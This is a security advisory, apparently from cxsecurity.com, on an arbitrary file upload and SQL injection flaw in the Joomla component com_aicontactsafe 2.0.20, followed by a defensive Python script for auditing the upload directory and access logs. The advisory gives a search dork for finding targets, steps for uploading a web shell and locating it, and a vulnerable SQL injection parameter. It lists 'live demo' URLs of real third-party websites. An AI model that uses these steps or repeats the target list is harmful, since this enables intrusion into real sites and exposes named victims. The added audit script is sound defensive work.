Joomla com_aicontactsafe Arbitrary File Upload / SQL injection Vulnerability

2016.07.19
Credit: xBADGIRL21
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

######################
# Exploit Title : Joomla com_aicontactsafe Arbitrary File Upload / SQL injection Vulnerability
# Exploit Author : xBADGIRL21
# Dork : inurl:index.php?option=com_aicontactsafe
# Software link : http://www.algisinfo.com/en/download/category/1-free-extensions.html
# Vendor Homepage : http://www.algisinfo.com/
# Version : 2.0.20
# Tested on: [ Windows]
# skype:xbadgirl21
# Date: 2016/07/18
# Video Proof : https://youtu.be/PdDmThHGVz8
######################
# [+] FILE UPLOAD :
######################
######################
# [+] DESCRIPTION :
######################
# [+] aiContactSafe is an AJAX-driven component to place a contact form anywhere on your web page
# [+] with any number of custom fields of different types, including attachments.
# [+] A shell upload and an SQLi have been detected in this component.
######################
# [+] PoC :
######################
# 1.- SELECT A WEBSITE FROM THE DORK ABOVE
# 2.- http://localhost/site/index.php?option=com_aicontactsafe
# 3.- Check whether you have access to this directory : media/aicontactsafe/attachments
# 4.- Just upload your shell, txt or image through the upload field
# 5.- Shell directory : media/aicontactsafe/attachments/[RANDOM_NUM]Evi!l.php or the extension uploaded
# Ex : http://malmoskyttegille.se/media/aicontactsafe/attachments/x_415.txt
######################
# [+] Live Demo:
######################
# http://malmoskyttegille.se/index.php?option=com_aicontactsafe
######################
# [+] SQL injection:
######################
# PoC :
# http://www.site.com/index.php?option=com_aicontactsafe&field=1
# AdminPanel :
# http://www.site.com/administrator
######################
# [+] Live Demo:
######################
# http://www.esbrasil.net/portal/index.php?option=com_aicontactsafe&field=1
# http://www.rustyspic-a-part.com/index.php?option=com_aicontactsafe&field=1
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
######################

References:

https://youtu.be/PdDmThHGVz8
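
For site owners running this component, the following added example (not part of the advisory or the vendor's code) audits the `media/aicontactsafe/attachments` directory named above for stored files that look executable and flags access-log requests that were served from it. It assumes Combined Log Format logs and a script-extension list chosen here for illustration; the sample log lines are constructed and use documentation IP addresses.

```python
import re
from pathlib import Path

# Upload directory named in the advisory, relative to the web root.
ATTACH_DIR = "media/aicontactsafe/attachments"
# Assumption: extensions a typical PHP host may pass to an interpreter.
SCRIPT_EXT = {".php", ".php3", ".php5", ".php7", ".phtml", ".phar", ".pht", ".cgi", ".pl"}
PHP_TAG = re.compile(rb"<\?(php|=)", re.I)
# Combined Log Format: client, request line, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')

# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Jul/2016:10:01:02 +0000] "POST /index.php?option=com_aicontactsafe HTTP/1.1" 200 5120',
    '203.0.113.7 - - [19/Jul/2016:10:01:09 +0000] "GET /media/aicontactsafe/attachments/8812_a.php HTTP/1.1" 200 312',
    '198.51.100.4 - - [19/Jul/2016:10:02:00 +0000] "GET /media/aicontactsafe/attachments/x_415.txt HTTP/1.1" 200 20',
    '198.51.100.9 - - [19/Jul/2016:10:03:00 +0000] "GET /media/aicontactsafe/attachments/77_b.phtml HTTP/1.1" 403 199',
]


def has_script_ext(name):
    """True if any dot-separated part is a script extension (catches x.php.jpg)."""
    parts = name.lower().split(".")[1:]
    return any("." + p in SCRIPT_EXT for p in parts)


def audit_attachments(webroot):
    """Return names of stored attachments with a script extension or a PHP open tag."""
    hits = []
    for f in sorted(Path(webroot, ATTACH_DIR).iterdir()):
        if not f.is_file():
            continue
        if has_script_ext(f.name) or PHP_TAG.search(f.read_bytes()[:4096]):
            hits.append(f.name)
    return hits


def suspicious_requests(log_lines):
    """Return (client, path, status) for script-like attachments served with 2xx."""
    out = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, url, status = m.groups()
        path = url.split("?", 1)[0]
        if ATTACH_DIR in path and has_script_ext(path.rsplit("/", 1)[-1]) and status.startswith("2"):
            out.append((client, path, int(status)))
    return out
```

A hit from `suspicious_requests` means the web server served a script-named file from the upload directory; the 403 line in the sample is what a server that denies script handling there would log instead.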



Copyright 2019, cxsecurity.com

 
